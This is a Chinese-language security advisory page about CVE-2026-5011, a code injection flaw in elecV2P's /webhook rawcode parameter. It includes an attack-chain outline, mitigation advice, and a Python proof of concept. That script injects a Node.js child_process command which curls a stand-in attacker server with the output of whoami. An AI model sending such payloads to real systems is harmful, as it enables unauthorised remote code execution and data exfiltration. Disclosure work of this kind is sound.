IPBUF安全漏洞报告
English
CVE-2026-5011 CVSS 6.3 中危

CVE-2026-5011: elecV2P代码注入漏洞

披露日期: 2026-03-28

漏洞信息

漏洞编号
CVE-2026-5011
漏洞类型
代码注入
CVSS评分
6.3 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
elecV2P

相关标签

代码注入RCEelecV2PCVE-2026-5011Webhook

漏洞概述

elecV2P项目存在代码注入漏洞,影响版本至3.8.3。该漏洞位于/webhook组件的JSON Parser的runJSFile函数中。由于对参数rawcode的处理不当,攻击者可进行恶意代码注入。此漏洞允许远程攻击者在无需用户交互的情况下执行任意代码,影响系统的机密性、完整性和可用性。目前利用代码已公开,且项目方尚未做出响应。

技术细节

该漏洞的根源在于elecV2P在处理/webhook接口请求时,未能对用户输入的rawcode参数实施严格的过滤与验证机制。当JSON Parser组件调用runJSFile函数处理数据时,直接将用户可控的rawcode内容传递至执行环境。由于缺乏有效的沙箱隔离或输入清洗,攻击者可以构造包含恶意JavaScript代码的请求Payload。当服务器解析并执行该Payload时,触发了代码注入攻击。鉴于CVSS向量显示PR:L,攻击者仅需低权限即可通过网络发起攻击,成功后可在服务器端执行任意系统命令,导致数据泄露或服务中断。

攻击链分析

STEP 1
1. 侦查
攻击者扫描网络,识别运行elecV2P且版本在3.8.3及以下的目标服务器。
STEP 2
2. 访问
攻击者获取目标系统的低权限账户(或利用未授权访问漏洞),满足PR:L的攻击前提条件。
STEP 3
3. 漏洞利用
攻击者构造恶意的JSON数据,在rawcode字段中植入Node.js执行命令的Payload,并向/webhook接口发送POST请求。
STEP 4
4. 代码执行
服务器端的runJSFile函数解析并执行了rawcode中的恶意代码,导致攻击者获得远程代码执行权限。
STEP 5
5. 后渗透
攻击者利用获得的Shell权限,进一步窃取数据、植入后门或横向移动,破坏系统机密性、完整性和可用性。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests def exploit(target_url): # Vulnerable endpoint url = f"{target_url}/webhook" # Malicious payload targeting the 'rawcode' parameter # This attempts to execute a shell command using Node.js child_process payload = { "rawcode": "require('child_process').exec('curl http://attacker-server/$(whoami)')" } headers = { "Content-Type": "application/json" } try: # Send POST request to trigger the vulnerability response = requests.post(url, json=payload, headers=headers, timeout=5) if response.status_code == 200: print("[+] Payload sent successfully. Check your listener.") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[!] An error occurred: {e}") if __name__ == "__main__": target = "http://127.0.0.1:80" # Replace with actual target exploit(target)

影响范围

elecV2P <= 3.8.3

防御指南

临时缓解措施
建议用户立即检查系统版本,若在受影响范围内,应暂时禁用webhook功能或断开服务网络连接以阻断攻击路径。同时,应密切监控系统日志和进程,查找是否存在异常的Node.js子进程调用或可疑的网络连接,直至官方修复方案发布并完成更新。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表